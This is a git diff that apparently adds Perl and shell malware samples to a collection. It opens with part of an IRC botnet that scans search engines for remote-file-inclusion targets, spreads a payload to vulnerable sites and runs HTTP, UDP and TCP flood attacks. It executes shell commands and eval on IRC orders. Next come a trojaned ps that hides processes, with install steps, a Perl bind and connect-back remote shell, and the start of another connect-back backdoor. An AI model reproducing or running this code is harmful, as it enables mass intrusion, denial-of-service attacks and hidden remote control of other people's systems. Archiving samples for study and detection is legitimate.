+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MrNETi/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### MAMMA
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @malist=&mamma($dork);
+push(my @tot, @malist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Mamma4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Mamma4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MrNETi/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MrNETi/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### MOZBOT
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @mozlist=&mozbot($dork);
+push(my @tot, @mozlist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MozBot4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MozBot4+ finished for14 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MrNETi/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MrNETi/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################
+#End of EXTREMEscanNER# 
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#     HTTPFlood      # 
+#                    #
+######################
+if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Attacking 4 ".$1." on port 80 for 4 ".$2." seconds .");
+my $itime = time;
+my ($cur_time);
+$cur_time = time - $itime;
+while ($2>$cur_time){
+$cur_time = time - $itime;
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
+print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
+close($socket);
+}
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Attacking done 4 ".$1.".");
+}
+######################
+#  End of HTTPFlood  # 
+#                    #
+######################
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+######################
+#     UDPFlood       # 
+#                    #
+######################
+if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Attacking4 ".$1." with 4 ".$2." Kb Packets for 4 ".$3." seconds.");
+my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
+$dtime = 1 if $dtime == 0;
+my %bytes;
+$bytes{igmp} = $2 * $pacotes{igmp};
+$bytes{icmp} = $2 * $pacotes{icmp};
+$bytes{o} = $2 * $pacotes{o};
+$bytes{udp} = $2 * $pacotes{udp};
+$bytes{tcp} = $2 * $pacotes{tcp};
+sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Results4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in4 ".$dtime." seconds to4 ".$1.".");
+}
+exit;
+}
+}
+######################
+#  End of Udpflood   # 
+#                    #
+######################
+
+
+sub ircase {
+my ($kem, $printl, $case) = @_;
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   }
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+if ($case =~ /^rejoin\s+(.*)/) {
+my $chan = $1;
+if ($chan =~ /^(\d+) (.*)/) {
+for (my $ca = 1; $ca <= $1; $ca++ ) {
+p("$2");
+j("$2");
+}
+}
+else {
+p("$chan");
+j("$chan");
+}
+}
+
+if ($case =~ /^op/) {
+op("$printl", "$kem") if $case eq "op";
+my $oarg = substr($case, 3);
+op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+}
+
+if ($case =~ /^deop/) {
+deop("$printl", "$kem") if $case eq "deop";
+my $oarg = substr($case, 5);
+deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+}
+
+if ($case =~ /^msg\s+(\S+) (.*)/) {
+msg("$1", "$2");
+}
+
+if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+for (my $cf = 1; $cf <= $1; $cf++) {
+msg("$2", "$3");
+}
+}
+
+if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+ctcp("$1", "$2");
+}
+
+if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+for (my $cf = 1; $cf <= $1; $cf++) {
+ctcp("$2", "$3");
+}
+}
+
+if ($case =~ /^nick (.*)/) {
+nick("$1");
+}
+
+if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
+conectar("$2", "$1", 6667);
+}
+
+if ($case =~ /^raw (.*)/) {
+sendraw("$1");
+}
+
+if ($case =~ /^eval (.*)/) {
+eval "$1";
+}
+}
+
+
+sub shell {
+my $printl=$_[0];
+my $comando=$_[1];
+if ($comando =~ /cd (.*)/) {
+chdir("$1") || msg("$printl", "No such file or directory");
+return;
+}
+
+elsif ($pid = fork) {
+waitpid($pid, 0);
+}
+else {
+if (fork) {
+exit;
+
+} else {
+my @resp=`$comando 2>&1 3>&1`;
+my $c=0;
+foreach my $linha (@resp) {
+  $c++;
+  chop $linha;
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+  if ($c == "$linas_max") {
+    $c=0;
+    sleep $sleep;
+  }
+}
+exit;
+}
+}
+}
+
+sub tcpflooder {
+my $itime = time;
+my ($cur_time);
+my ($ia,$pa,$proto,$j,$l,$t);
+$ia=inet_aton($_[0]);
+$pa=sockaddr_in($_[1],$ia);
+$ftime=$_[2];
+$proto=getprotobyname('tcp');
+$j=0;$l=0;
+$cur_time = time - $itime;
+while ($l<1000){
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+$t="SOCK$l";
+socket($t,PF_INET,SOCK_STREAM,$proto);
+connect($t,$pa)||$j--;
+$j++;$l++;
+}
+$l=0;
+while ($l<1000){
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+$t="SOCK$l";
+shutdown($t,2);
+$l++;
+}
+}
+
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+# % cHApoenk XtReme scanner Bot  %
+# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
+
+sub udpflooder {
+my $iaddr = inet_aton($_[0]);
+my $msg = 'A' x $_[1];
+my $ftime = $_[2];
+my $cp = 0;
+my (%pacotes);
+$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+return(undef) if $cp == 4;
+my $itime = time;
+my ($cur_time);
+while ( 1 ) {
+for (my $porta = 1;
+$porta <= 65000; $porta++) {
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+
+for (my $pc = 3;
+$pc <= 255;$pc++) {
+next if $pc == 6;
+$cur_time = time - $itime;
+last if $cur_time >= $ftime;
+socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
+}
+}
+last if $cur_time >= $ftime;
+}
+return($cur_time, %pacotes);
+}
+
+sub ctcp {
+return unless $#_ == 1;
+sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+
+sub msg {
+return unless $#_ == 1;
+sendraw("PRIVMSG $_[0] :$_[1]");
+}
+
+sub notice {
+return unless $#_ == 1;
+sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+return unless $#_ == 1;
+sendraw("MODE $_[0] +o $_[1]");
+}
+
+sub deop {
+return unless $#_ == 1;
+sendraw("MODE $_[0] -o $_[1]");
+}
+
+sub j {
+&join(@_);
+}
+
+sub join {
+return unless $#_ == 0;
+sendraw("JOIN $_[0]");
+
+}
+sub p { part(@_);
+}
+
+sub part {
+sendraw("PART $_[0]");
+}
+
+sub nick {
+return unless $#_ == 0;
+sendraw("NICK $_[0]");
+}
+
+sub quit {
+sendraw("QUIT :$_[0]");
+}
+
+#####
+# SUBS GOOGLE
+#####
+sub googlet {
+my @dominios = ("ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk");
+my @country = ("AE","AR","AT","AU","BE","BR","CA","CH","CL","DE","DK");
+my @lang = ("en","es","de","nl","pt-BR","it","de","fo","sv","fr","el");
+my @lst;
+my $key=key($_[0]);
+my $c=0;
+foreach my $i (@dominios){
+my @lista = google($i,$key,$lang[$c],$country[$c]);
+push(@lst,@lista);
+$c++;
+}
+return @lst;
+}
+
+sub google(){
+my @lst;
+my $i=$_[0];
+my $key=$_[1];
+my $lang= $_[2];
+my $country =$_[3];
+for($b=0;$b<=5000;$b+=100){
+my $Go=("www.google.".$i."/search?hl=".$lang."&q=".key($key)."&num=100&start=".$b."&meta=cr%3Dcountry".$country);
+my $Res=query($Go);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /google/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS AllTheWeb
+#####
+
+sub allthewebt {
+my @lang = ("en","es","de","nl","pt-BR","it","de","fo");
+my @lst;
+my $key=key($_[0]);
+my $c=0;
+foreach my $lang (@lang){
+my @lista = alltheweb($key,$lang[$c]);
+push(@lst,@lista);
+$c++;
+}
+return @lst;
+}
+
+
+sub alltheweb(){
+my @lista;
+my $key = $_[0];
+my $lang= $_[1];
+for($b=0;$b<=500;$b+=100){
+my $alltheweb=("http://www.alltheweb.com/search?cat=web&_sb_lang=".$lang."&hits=100&q=".key($key)."&o=".$b);
+my $Res=query($alltheweb);
+while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub standard()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=1000; $i+=100)
+{
+my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
+my $Res=query($all);
+while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS Lycos
+#####
+sub lycos(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $ly=("http://search.lycos.com/?query=".key($key)."&page=$av".$b);
+my $Res=query($ly);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS Yahoo
+#####
+sub yahoo(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=100){
+my $Ya=("http://br.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahooa(){
+my @lst;
+my $key = $_[0];
+for($b=210;$b<=1000;$b+=210){
+my $Ya=("http://be.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahoob(){
+my @lst;
+my $key = $_[0];
+for($b=410;$b<=1000;$b+=210){
+my $Ya=("http://us.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahooc(){
+my @lst;
+my $key = $_[0];
+for($b=610;$b<=1000;$b+=210){
+my $Ya=("http://it.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub yahood(){
+my @lst;
+my $key = $_[0];
+for($b=810;$b<=1000;$b+=210){
+my $Ya=("http://de.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b);
+my $Res=query($Ya);
+while($Res =~ m/\<span class=yschurl>(.+?)\<\/span>/g){
+my $k=$1;
+$k=~s/<b>//g;
+$k=~s/<\/b>//g;
+$k=~s/<wbr>//g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+#####
+# SUBS MSN
+#####
+sub msn(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
+my $Res=query($MsN);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if($1 !~ /msn|live/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS SEARCH
+#####
+sub search(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $ser=("http://www.search.com/search?q=".key($key)."".$b);
+my $Res=query($ser);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# SUBS FireBall
+#####
+sub fireball(){
+my $key=$_[0];
+my $inizio=1;
+my $pagine=200;
+my @lst;
+my $av=0;
+while($inizio <= $pagine){
+my $fireball="http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=fb_loc&idx=all&enc=utf-8";
+my $Res=query($fireball);
+while ($Res=~ m/<a href=\"?http:\/\/(.+?)\//g ){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k="$1/";
+my @grep=links($k);
+push(@lst,@grep);
+}}
+$av=$av+10;
+$inizio++;
+}
+return @lst;
+}
+
+#####
+# SUBS UOL
+#####
+sub uol(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i);
+my $Res=query($UoL);
+while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
+my $k=$1;
+if($k!~/busca|uol|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# Altavista
+#####
+sub altavista(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
+my $Res=query($AlT);
+while($Res=~m/<span class=ngrn>(.+?)\//g){
+if($1 !~ /altavista/){
+my $k=$1;
+$k=~s/<//g;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub altavistade(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $AlT=("http://de.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
+my $Res=query($AlT);
+while($Res=~m/<span class=ngrn>(.+?)\//g){
+if($1 !~ /altavista/){
+my $k=$1;
+$k=~s/<//g;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+sub altavistaus(){
+my @lst;
+my $key = $_[0];
+for($b=1;$b<=1000;$b+=10){
+my $AlT=("http://us.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
+my $Res=query($AlT);
+while($Res=~m/<span class=ngrn>(.+?)\//g){
+if($1 !~ /altavista/){
+my $k=$1;
+$k=~s/<//g;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# HotBot
+#####
+sub hotbot(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $hot=("http://search.hotbot.de/cgi-bin/pursuit?pag=$av&query=".key($key)."&cat=hb_loc&enc=utf-8".$b);
+my $Res=query($hot);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+
+#####
+# Mamma
+#####
+sub mamma(){
+my @lst;
+my $key = $_[0];
+for($b=0;$b<=1000;$b+=100){
+my $mam=("http://www.mamma.com/Mamma?utfout=$av&qtype=0&query=".key($key)."".$b);
+my $Res=query($mam);
+while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
+if ($1 !~ /msn|live|google|yahoo/){
+my $k=$1;
+my @grep=links($k);
+push(@lst,@grep);
+}}}
+return @lst;
+}
+
+#####
+# MozBot
+#####
+sub mozbot()
+{
+my @lst;
+my $key=$_[0];
+my $i=0;
+my $pg=0;
+for($i=0; $i<=100; $i+=1){
+my $mozbot=("http://www.mozbot.fr/search?q=".key($key)."&st=int&page=".$i);
+my $Res=query($mozbot);
+while($Res =~ m/<a href=\"?http:\/\/(.+?)\" target/g){
+my $k=$1;
+$k=~s/ //g;
+my @grep=links($k);
+push(@lst,@grep);
+}}
+return @lst;
+}
+
+sub links()
+{
+my @l;
+my $link=$_[0];
+my $host=$_[0];
+my $hdir=$_[0];
+$hdir=~s/(.*)\/[^\/]*$/\1/;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$host.="/";
+$link.="/";
+$hdir.="/";
+$host=~s/\/\//\//g;
+$hdir=~s/\/\//\//g;
+$link=~s/\/\//\//g;
+push(@l,$link,$host,$hdir);
+return @l;
+}
+
+sub geths(){
+my $host=$_[0];
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+return $host;
+}
+
+sub key(){
+my $chiave=$_[0];
+$chiave =~ s/ /\+/g;
+$chiave =~ s/:/\%3A/g;
+$chiave =~ s/\//\%2F/g;
+$chiave =~ s/&/\%26/g;
+$chiave =~ s/\"/\%22/g;
+$chiave =~ s/,/\%2C/g;
+$chiave =~ s/\\/\%5C/g;
+return $chiave;
+}
+
+sub query($){
+my $url=$_[0];
+$url=~s/http:\/\///;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host=~s/href=\"?http:\/\///;
+$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query=~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+close($sock);
+};
+return $page;
+}
+
+sub unici{
+my @unici = ();
+my %visti = ();
+foreach my $elemento ( @_ )
+{
+next if $visti{ $elemento }++;
+push @unici, $elemento;
+}   
+return @unici;
+}
+
+sub http_query($){
+my ($url) = @_;
+my $host=$url;
+my $query=$url;
+my $page="";
+$host =~ s/href=\"?http:\/\///;
+$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+$query =~s/$host//;
+if ($query eq "") {$query="/";};
+eval {
+local $SIG{ALRM} = sub { die "1";};
+alarm 10;
+my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+my @r = <$sock>;
+$page="@r";
+alarm 0;
+close($sock);
+};
+return $page;
+}
+}
+
+
+###############################################
+#					      #
+#	cHApoenk XtReme scanNER		      #
+#					      #
+###############################################
+
+
+
diff --git a/Perl/Backdoor.Perl.Psesb b/Perl/Backdoor.Perl.Psesb
new file mode 100644
index 00000000..15a092e0
--- /dev/null
+++ b/Perl/Backdoor.Perl.Psesb
@@ -0,0 +1,40 @@
+#
+# lame tiny easy to use backdoor for ps
+#
+# the word placed after filterword= will be filtered out of the output of ps
+#
+# usage:
+# # mv /bin/ps /bin/.ps
+# # cp ~/psbackdoor.sh /bin/ps
+# # chmod a+x /bin/ps
+#
+# Thats it, have phun scriptkiddies
+# The Itch / Bse / g0tr00t
+# http://bse.die.ms
+# http://www.g0tr00t.net
+
+filterword="su"
+
+originalps=/bin/.ps
+tempfile=/tmp/.pstmp
+grep=/bin/grep
+numlines=0
+
+touch $tempfile
+
+if [ ! -x $originalps ]; then
+	echo "Error: original ps not found!";
+	exit 1
+fi
+
+if [ ! -w $tempfile ]; then
+	echo "Error: tempfile handling failed!";
+	exit 1
+fi
+
+$originalps $1 $2 $3 $4| $grep -v $filterword > $tempfile
+numlines=`cat $tempfile|wc -l`
+numlines=`expr $numlines - 2`
+head -n $numlines $tempfile
+rm -rf $tempfile
+
diff --git a/Perl/Backdoor.Perl.RShell.a b/Perl/Backdoor.Perl.RShell.a
new file mode 100644
index 00000000..93c86ae9
--- /dev/null
+++ b/Perl/Backdoor.Perl.RShell.a
@@ -0,0 +1,130 @@
+
+#
+
+#   Asmodeus v0.1
+
+#   Perl Remote Shell
+
+#   by phuket
+
+#   www.smoking-gnu.org
+
+#
+
+#   (Server is based on some code found on [url=http://www.governmentsecurity.org)]www.governmentsecurity.org)[/url]
+
+#   
+
+
+
+#   perl asmodeus.pl client 6666 127.0.0.1
+
+#   perl asmodeus.pl server 6666
+
+#
+
+
+
+
+
+use Socket;
+
+
+
+$cs=$ARGV[0];
+
+$port=$ARGV[1];
+
+$host=$ARGV[2];
+
+
+
+if ($cs eq 'client') {&client}
+
+elsif ($cs eq 'server') {&server}
+
+
+
+
+
+
+
+
+
+sub client{
+
+socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
+
+$internet_addr = inet_aton("$host") or die "ALOA:$!\n";
+
+$paddr=sockaddr_in("$port", $internet_addr);
+
+connect(TO_SERVER, $paddr) or die "$port:$internet_addr:$!\n";
+
+open(STDIN, ">&TO_SERVER");
+
+open(STDOUT, ">&TO_SERVER");
+
+open(STDERR, ">&TO_SERVER");
+
+print "Asmodeus Perl Remote Shell\n";
+
+system(date);
+
+system("/bin/sh");
+
+close(TO_SERVER);
+
+}
+
+
+
+
+
+
+
+
+
+
+
+sub server{
+
+$proto=getprotobyname('tcp');
+
+$0="asm";
+
+$system='/bin/sh';
+
+socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
+
+setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
+
+bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
+
+listen(SERVER, SOMAXCONN) or die "listen: $!";
+
+for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
+
+  open(STDIN, ">&CLIENT");
+
+  open(STDOUT, ">&CLIENT");
+
+  open(STDERR, ">&CLIENT");
+
+  print "Asmodeus Perl Remote Shell\n";
+
+  system(date);
+
+  system("/bin/sh");
+
+  close(STDIN);
+
+  close(STDOUT);
+
+  close(STDERR);
+
+  return;
+
+}
+
+}
\ No newline at end of file
diff --git a/Perl/Backdoor.Perl.RShell.b b/Perl/Backdoor.Perl.RShell.b
new file mode 100644
index 00000000..ac569465
--- /dev/null
+++ b/Perl/Backdoor.Perl.RShell.b
@@ -0,0 +1,60 @@
+use IO::Socket;
+#WwW.CoM Security Hackers          
+#coded bY: MasterKid
+#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                          
+#Email: muzicteam2006@yahoo.com
+#
+#kid@SlackwareLinux:/home/programing$ perl dc.pl
+#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
+#
+#Usage: dc.pl [Host] [Port]
+#
+#Ex: dc.pl 127.0.0.1 2121
+#kid@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
+#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
+#
+#[*] Resolving HostName
+#[*] Connecting... 127.0.0.1
+#[*] Spawning Shell
+#[*] Connected to remote host
+
+#bash-2.05b# nc -vv -l -p 2121
+#listening on [any] 2121 ...
